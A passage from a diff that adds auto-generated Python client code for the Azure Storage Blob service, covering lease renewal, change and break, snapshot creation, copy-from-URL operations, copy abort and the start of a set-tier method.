[200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + renew_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def change_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + proposed_lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. + :type proposed_lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "change". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "change") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_change_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + proposed_lease_id=proposed_lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.change_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + change_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def break_lease( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + break_period=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param break_period: For a break operation, proposed duration the lease should continue before + it is broken, in seconds, between 0 and 60. This break period is only used if it is shorter + than the time remaining on the lease. If longer, the time remaining on the lease is used. A new + lease will not be available before the break period has expired, but the lease may be held for + longer than the break period. If this header does not appear with a break operation, a + fixed-duration lease breaks after the remaining lease period elapses, and an infinite lease + breaks immediately. Default value is None. + :type break_period: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "break". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "break") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_break_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + timeout=timeout, + break_period=break_period, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.break_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-time']=self._deserialize('int', response.headers.get('x-ms-lease-time')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + break_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def create_snapshot( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + request_id_parameter=None, # type: Optional[str] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Create Snapshot operation creates a read-only snapshot of a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "snapshot". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "snapshot") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_create_snapshot_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + metadata=metadata, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.create_snapshot.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-snapshot']=self._deserialize('str', response.headers.get('x-ms-snapshot')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create_snapshot.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def start_copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_source, # type: str + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + tier=None, # type: Optional[Union[str, "_models.AccessTierOptional"]] + rehydrate_priority=None, # type: Optional[Union[str, "_models.RehydratePriority"]] + request_id_parameter=None, # type: Optional[str] + blob_tags_string=None, # type: Optional[str] + seal_blob=None, # type: Optional[bool] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Start Copy From URL operation copies a blob or an internet resource to a new blob. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param rehydrate_priority: Optional: Indicates the priority with which to rehydrate an archived + blob. Default value is None. + :type rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param seal_blob: Overrides the sealed state of the destination blob. Service version + 2019-12-12 and newer. Default value is None. + :type seal_blob: bool + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _source_if_tags = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + _source_if_tags = source_modified_access_conditions.source_if_tags + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_start_copy_from_url_request( + url=self._config.url, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + metadata=metadata, + tier=tier, + rehydrate_priority=rehydrate_priority, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + source_if_tags=_source_if_tags, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + seal_blob=seal_blob, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.start_copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + start_copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_source, # type: str + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + tier=None, # type: Optional[Union[str, "_models.AccessTierOptional"]] + request_id_parameter=None, # type: Optional[str] + source_content_md5=None, # type: Optional[bytearray] + blob_tags_string=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + copy_source_authorization=None, # type: Optional[str] + copy_source_tags=None, # type: Optional[Union[str, "_models.BlobCopySourceTags"]] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Copy From URL operation copies a blob or an internet resource to a new blob. It will not + return a response until the copy is complete. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param copy_source_tags: Optional, default 'replace'. Indicates if source tags should be + copied or replaced with the tags specified by x-ms-tags. Default value is None. + :type copy_source_tags: str or ~azure.storage.blob.models.BlobCopySourceTags + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :keyword x_ms_requires_sync: This header indicates that this is a synchronous Copy Blob From + URL instead of a Asynchronous Copy Blob. Default value is "true". Note that overriding this + default value may result in unsupported behavior. + :paramtype x_ms_requires_sync: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + x_ms_requires_sync = kwargs.pop('x_ms_requires_sync', "true") # type: str + + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + _encryption_scope = None + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + + request = build_copy_from_url_request( + url=self._config.url, + x_ms_requires_sync=x_ms_requires_sync, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + metadata=metadata, + tier=tier, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + source_content_md5=source_content_md5, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + copy_source_authorization=copy_source_authorization, + encryption_scope=_encryption_scope, + copy_source_tags=copy_source_tags, + template_url=self.copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def abort_copy_from_url( # pylint: disable=inconsistent-return-statements + self, + copy_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Abort Copy From URL operation aborts a pending Copy From URL operation, and leaves a + destination blob with zero length and full metadata. + + :param copy_id: The copy identifier provided in the x-ms-copy-id header of the original Copy + Blob operation. + :type copy_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "copy". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword copy_action_abort_constant: Copy action. Default value is "abort". Note that + overriding this default value may result in unsupported behavior. + :paramtype copy_action_abort_constant: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "copy") # type: str + copy_action_abort_constant = kwargs.pop('copy_action_abort_constant', "abort") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_abort_copy_from_url_request( + url=self._config.url, + comp=comp, + copy_action_abort_constant=copy_action_abort_constant, + version=self._config.version, + copy_id=copy_id, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.abort_copy_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [204]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + abort_copy_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def set_tier( # pylint: disable=inconsistent-return-statements + self, + tier, # type: Union[str, "_models.AccessTierRequired"] + snapshot=None, # type: Optional[str] + version_id=None, # type: Optional[str] + timeout=None, # type: Optional[int] + rehydrate_priority=None, # type: Optional[Union[str, "_models.RehydratePriority"]] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Set Tier operation sets the tier on a blob. The operation is allowed on a page blob in a + premium storage account and on a block blob in a 